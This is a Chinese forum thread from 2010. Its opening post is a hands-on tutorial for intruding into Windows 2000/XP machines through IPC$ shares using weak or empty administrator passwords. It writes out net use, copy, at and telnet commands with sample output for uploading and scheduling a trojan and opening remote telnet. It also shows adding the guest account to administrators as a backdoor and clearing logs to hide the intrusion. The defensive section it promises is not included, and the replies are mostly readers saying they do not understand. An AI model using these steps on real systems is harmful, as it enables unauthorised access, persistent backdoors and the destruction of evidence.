独家经典秘籍IPC入侵电脑 今天我就给大家分享了

社区服务
高级搜索
猴岛论坛电脑百科独家经典秘籍IPC入侵电脑 今天我就给大家分享了
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
14个回复

独家经典秘籍IPC入侵电脑 今天我就给大家分享了

楼层直达
hd78815913

ZxID:11069378

等级: 中尉
猴岛网络警察中心

举报 只看楼主 使用道具 楼主   发表于: 2010-05-15 0
1 扫描IPC$主机
假设,我们扫描了一台IPC$主机:127.0.0.25
  用户名:davis
  密码:空
  “//”后是注解。
  Microsoft Windows 2000 [Version 5.00.2195]
  (C) 版权所有 1985-1998 Microsoft Corp.
  D:>net use \127.0.0.25$ "" /user:"davis" //这是我用流光扫到的密码~~~我们就拿它开刀吧~!
  命令成功完成。
  D:>copy srv.exe \127.0.0.25$ //先复制srv.exe上去,在流光的Tools目录就有。
  已复制 1 个文件。
  D:>net time \127.0.0.25 //查查时间。
  \127.0.0.25 的当前时间是 2001/1/17 上午 10:48
  命令成功完成。
  D:>at \\127.0.0.25 10:50 srv.exe //用at命令启动srv.exe吧~!(这里设置的时间要比主机时间快)先去论坛灌几篇帖子。
  新加了一项作业,其作业 ID = 1
  D:>net time \\127.0.0.25 //再查查够时间没有?!噢~~够了~
  127.0.0.25 的当前时间是 2001/1/17 上午 10:51
  命令成功完成。
  D:>telnet 127.0.0.25 99 //我们telnet吧,注意端口是99哦~
  Microsoft Windows 2000 [セ 5.00.2195]
  (C) Copyright 1985-1999 Microsoft Corp.
  C:> //噢~~成功了!
  D:>copy ntlm.exe \\127.0.0.25$ //我们再开一个DOS窗口,把ntlm.exe上传到主机上。(也是在流光流光的Tools目录)
  已复制 1 个文件。
  Microsoft Windows 2000 [セ 5.00.2195]
  (C) Copyright 1985-1999 Microsoft Corp.
  C:>ntlm //我们输入ntlm启动吧。
  ntlm
  Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
  Done! //OK~:)
  C:>
  C:>net start telnet //然后直接用net start telnet启动telnet.
  net start telnet
1 建立空连接: 
net use \\IP\ipc$ "" /user:"" 

2 建立非空连接: 
net use \\IP\ipc$ "psw" /user:"account" 

3 查看远程主机的共享资源(但看不到默认共享) 
net view \\IP 

4 查看本地主机的共享资源(可以看到本地的默认共享) 
net share 

5 得到远程主机的用户名列表 
nbtstat -A IP 

6 得到本地主机的用户列表 
net user 

7 查看远程主机的当前时间 
net time \\IP 

8 显示本地主机当前服务 
net start 

9 启动/关闭本地服务 
net start 服务名 /y 
net stop 服务名 /y 

10 映射远程共享: 
net use z: \\IP\baby 
此命令将共享名为baby的共享资源映射到z盘 

11 删除共享映射 
net use c: /del 删除映射的c盘,其他盘类推 
net use * /del /y删除全部 

12 向远程主机复制文件 
copy \路径\srv.exe \\IP\共享目录名,如: 
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内 

13 远程添加计划任务 
at \\ip 时间 程序名,如: 
at \\127.0.0.0 11:00 love.exe 
注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径 


14 开启远程主机的telnet 
这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求: 

1)目标开启了ipc$共享 
2)你要拥有管理员密码和帐号 
3)目标开启RemoteRegistry服务,用户就该ntlm认证 
4)对WIN2K/XP有效,NT未经测试 
命令格式:OpenTelnet.exe \\server account psw NTLM认证方式 port 
试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90 

15 激活用户/加入管理员组 
1 net uesr account /active:yes 
2 net localgroup administrators account /add 
16 关闭远程主机的telnet 
同样需要一个小程序:ResumeTelnet.exe 
命令格式:ResumeTelnet.exe \\server account psw 
试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator "" 

17 删除一个已建立的ipc$连接 
net use \\IP\ipc$ /del 
十二 ipc$完整入侵步骤祥解 

其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了! 

1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空 


2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧 


3上面开telnet的命令没忘吧,要用到opentelnet这个小程序 
c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90 
如果返回如下信息 
******************************************************* 
Remote Telnet Configure, by refdom 
Email: [email protected] 
OpenTelnet.exe 

UsagepenTelnet.exe \\server username password NTLMAuthor telnetport 
******************************************************* 
Connecting \\192.168.21.*...Successfully! 

NOTICE!!!!!! 
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23 

Starting telnet service... 
telnet service is started successfully! telnet service is running! 

BINGLE!!!Yeah!! 
Telnet Port is 90. You can try:"telnet ip 90", to connect the server! 
Disconnecting server...Successfully! 
*说明你已经打开了一个端口90的telnet。 


4 现在我们telnet上去 
telnet 192.168.21.* 90 
如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了 


5 C:\>net user guest /active:yes 
*将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no 


6 C:\>net user guest 1234 
*将Guest的密码改为1234,或者改成你喜欢的密码 


7 C:\>net localgroup administrators guest /add 
*将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。 


8 好了,现在我们来走另一条路,给它传个木马玩玩 


9 首先,我们先建立起ipc$连接 
C:\>net use \\192.168.21.*\ipc$ "" /user:administrator 


10 既然要上传东西,就要先知道它开了什么共享 
C:\>net view \\192.168.21.* 
在 \\192.168.21.*的共享资源 
资源共享名 类型 用途 注释 

----------------------------------------------------------- 
C Disk 
D Disk 
命令成功完成。 
*好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。 


11 C:\>copy love.exe \\192.168.21.*\c 
已复制 1 个文件 
*用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现 


12 运行木马前,我们先看看它现在的时间 
net time \\192.168.21.* 
\\192.168.21.*的当前时间是 2003/8/22 上午 11:00
命令成功完成 


13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了 
C:\>at \\192.168.21.* 11:02 c:\love.exe 
新加了一项作业,其作业 ID = 1 


14 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了 


嗯,好了,两种基本方法都讲了。如果你对上面的操作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用p***ec执行木马,用命令:p***ec \\tergetIP -u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。 
讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面

本帖de评分: 1 条评分 DB +10
DB+10

我很赞同

┌.淫穆”

ZxID:10737016

等级: 上将
..

举报 只看该作者 沙发   发表于: 2010-05-15 0
沙发继续努力
鸣人の悲伤

ZxID:11644230

等级: 中将
☆☆★★猴.岛.萨.皮.组★★☆☆

举报 只看该作者 板凳   发表于: 2010-05-15 0
路过。。。看不懂
小时候可帅啦丶

ZxID:11348797

等级: 禁止发言

举报 只看该作者 地板   发表于: 2010-05-15 0
无奈,
漂移的猫

ZxID:11830276

等级: 上尉

举报 只看该作者 4楼  发表于: 2010-05-15 0
我看不懂啊

輸給、現實

ZxID:11814025

等级: 少将
过去只是生活 的点缀,并不是一种负担。

举报 只看该作者 5楼  发表于: 2010-05-15 0
有點迷糊
<a href='http://www.qqjay.net/html/old8/fzl/2010/0817/27635.html'>非主流可爱时尚美女图片_银·杏·物·语 — 非主流图片 QQ空间图片 QQJAY空间站 WWW.QQJAY.COM</a>
qwe22908

ZxID:7290439

等级: 少尉
什么东东啊~~~!
举报 只看该作者 6楼  发表于: 2010-05-15 0
不了解 
hutao1993819

ZxID:10244552

等级: 上等兵
举报 只看该作者 7楼  发表于: 2010-05-15 0
       
G
。。慢

ZxID:11930898

等级: 中士
走自己的路让别人搭车去把。。我要慢慢的来呵呵
举报 只看该作者 8楼  发表于: 2010-05-16 0
不懂
hd78815913

ZxID:11069378

等级: 中尉
猴岛网络警察中心

举报 只看该作者 9楼  发表于: 2010-05-30 0
为什么我的不加
极炫ャ黑羽

ZxID:5710314

等级: 中将
http://www.qqbye.com/gif/Uploa
举报 只看该作者 10楼  发表于: 2010-05-30 0
真的好长  不过谢谢分享
wxjzero

ZxID:1706844

等级: 准尉
举报 只看该作者 11楼  发表于: 2010-05-30 0
抄出来的没什么意思  理解不上去的  用自己的话给大家解释一下  呵呵
楚丶狂人

ZxID:10118862

等级: 少校
怎么写你说
举报 只看该作者 12楼  发表于: 2010-06-01 0
空连接  漏洞现在没了
-[本人樂樂]

ZxID:12238702

等级: 列兵
举报 只看该作者 13楼  发表于: 2010-06-01 0
    看不明白.
_小华。

ZxID:11550688

等级: 中将
.

举报 只看该作者 14楼  发表于: 2010-06-01 0
说明白点行吗?
  ﹎葬.血轩.康  濄眼繧珚  ★°小豪。〃  №ˉ浠癷
« 返回列表
发帖 回复